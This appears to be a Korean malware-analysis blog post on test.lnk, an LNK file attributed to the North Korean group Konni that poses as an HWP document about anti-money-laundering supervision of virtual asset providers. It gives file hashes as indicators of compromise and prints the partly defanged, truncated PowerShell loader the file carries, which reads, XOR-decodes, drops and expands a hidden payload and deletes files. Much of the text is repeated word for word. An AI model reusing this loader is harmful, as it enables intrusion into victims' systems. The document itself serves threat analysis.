북한 코니(Konni) 가상자산사업자 자금세탁방지 감독 방향 위장을 하는 악성코드-test.lnk(2025.2.28)
Contents
오늘은 북한 해킹 단체 코니(Konni) 에서 만든 악성코드에서 만든 악성코드인 test.lnk 에 대해 알아보겠습니다. 해당 악성코드 제목을 보면 이제는 성의조차 안 보인다는 것을 알게 될 것입니다.
일단 악성코드를 실행하면 가상자산사업자 자금세탁방지 감독 방향이라는 제목으로 hwp 로 위장을 하고 있습니다.
파일명:test.lnk
사이즈:2 MB
MD5:6467861415139a1ee35f2b036e57c494
SHA-1:86c4315e90a5950e7ae87e3eca991274dd420459
SHA-256:2dcb83b80eef4018e85d56c2e19fd176b2a77042239d730aac055fc74a6aaba9
일단 기존의 고전적인 방식인 LNK 파일인 것처럼 위장돼 있지만 실제로는 해당 악성코드에서 파워셀 코드가 포함된 것이 특징입니다.
악성코드에 포함된 파워셀 코드
StringData
{
namestring: hwp File
relativepath: not present
workingdir: not present
commandlinearguments:
/c for /f "tokens=*" %f in ('dir /s /b %systemroot%\System32\Window
sPowershell\*(.)exe ^| findstr /i rshell.exe') do (if exist "%f" (%f
"function sti(f)f{param($attended); <#right distinction#>$management
= $attended(.)substring(0,$attended.length-4) + ''; <#african plaster
#>return $management;(});function female{param($partly);<#honorable pl
ead(#)> remove-item <#oppression establish#> -path $partly <#hol(y) inc
ident#> -force;};function twin{param($plane,$extent,$fresh,$(p)rofession,$elder);<#si
xteenth parish#> $latin=New-Object System.IO.FileStre(a)m(<#trust painful#>$plane,<#j
oin apron#>[System.IO.FileMode]::Open,<#(s)pirited tarnish#>[System.IO(.)FileAccess]:
:Read);<#pocket cleanse#> $latin.Seek(<#utt()erly tumultuous#>$extent,[Sy(s)tem.IO.Se
ekOrigin]::Begin);<#prudence ascent#> $hissing=$fresh*0x01;<#sea(w)eed cloister#> $cl
uster=New-Object byte[] <#infection must#>$fresh; <#c(h)eck integrity#> $close=New-Ob
ject byte[] <#whole recover#>$hissing; <#cheri(s)h fond#>$latin.Read(<#above fitting#
>$close(,)0,<#strip(e) crime#>$hissing); $latin.Close();$think=0;while(($)think -lt $
fresh){<#wreck prosperity#>$cluster[$think]=$clo(s)e[$think*0x01] -bxor $profession;$
think++;}<#conceal moon(#)> set-content $elder <#wheat scope#> $cluster -Encoding <#a
cquire pleadin(g)#> Byte;};function slowly{param($confusion, $exalt);<#cr(e)st undue#
> expand $confusion <#surgery …
일단 악성코드를 실행하면 가상자산사업자 자금세탁방지 감독 방향이라는 제목으로 hwp 로 위장을 하고 있습니다.
파일명:test.lnk
사이즈:2 MB
MD5:6467861415139a1ee35f2b036e57c494
SHA-1:86c4315e90a5950e7ae87e3eca991274dd420459
SHA-256:2dcb83b80eef4018e85d56c2e19fd176b2a77042239d730aac055fc74a6aaba9
일단 기존의 고전적인 방식인 LNK 파일인 것처럼 위장돼 있지만 실제로는 해당 악성코드에서 파워셀 코드가 포함된 것이 특징입니다.
악성코드에 포함된 파워셀 코드
StringData
{
namestring: hwp File
relativepath: not present
workingdir: not present
commandlinearguments:
/c for /f "tokens=*" %f in ('dir /s /b %systemroot%\System32\Window
sPowershell\*(.)exe ^| findstr /i rshell.exe') do (if exist "%f" (%f
"function sti(f)f{param($attended); <#right distinction#>$management
= $attended(.)substring(0,$attended.length-4) + ''; <#african plaster
#>return $management;(});function female{param($partly);<#honorable pl
ead(#)> remove-item <#oppression establish#> -path $partly <#hol(y) inc
ident#> -force;};function twin{param($plane,$extent,$fresh,$(p)rofession,$elder);<#si
xteenth parish#> $latin=New-Object System.IO.FileStre(a)m(<#trust painful#>$plane,<#j
oin apron#>[System.IO.FileMode]::Open,<#(s)pirited tarnish#>[System.IO(.)FileAccess]:
:Read);<#pocket cleanse#> $latin.Seek(<#utt()erly tumultuous#>$extent,[Sy(s)tem.IO.Se
ekOrigin]::Begin);<#prudence ascent#> $hissing=$fresh*0x01;<#sea(w)eed cloister#> $cl
uster=New-Object byte[] <#infection must#>$fresh; <#c(h)eck integrity#> $close=New-Ob
ject byte[] <#whole recover#>$hissing; <#cheri(s)h fond#>$latin.Read(<#above fitting#
>$close(,)0,<#strip(e) crime#>$hissing); $latin.Close();$think=0;while(($)think -lt $
fresh){<#wreck prosperity#>$cluster[$think]=$clo(s)e[$think*0x01] -bxor $profession;$
think++;}<#conceal moon(#)> set-content $elder <#wheat scope#> $cluster -Encoding <#a
cquire pleadin(g)#> Byte;};function slowly{param($confusion, $exalt);<#cr(e)st undue#
> expand $confusion <#surgery …
IoC
86c4315e90a5950e7ae87e3eca991274dd420459
6467861415139a1ee35f2b036e57c494
2dcb83b80eef4018e85d56c2e19fd176b2a77042239d730aac055fc74a6aaba9
6467861415139a1ee35f2b036e57c494
2dcb83b80eef4018e85d56c2e19fd176b2a77042239d730aac055fc74a6aaba9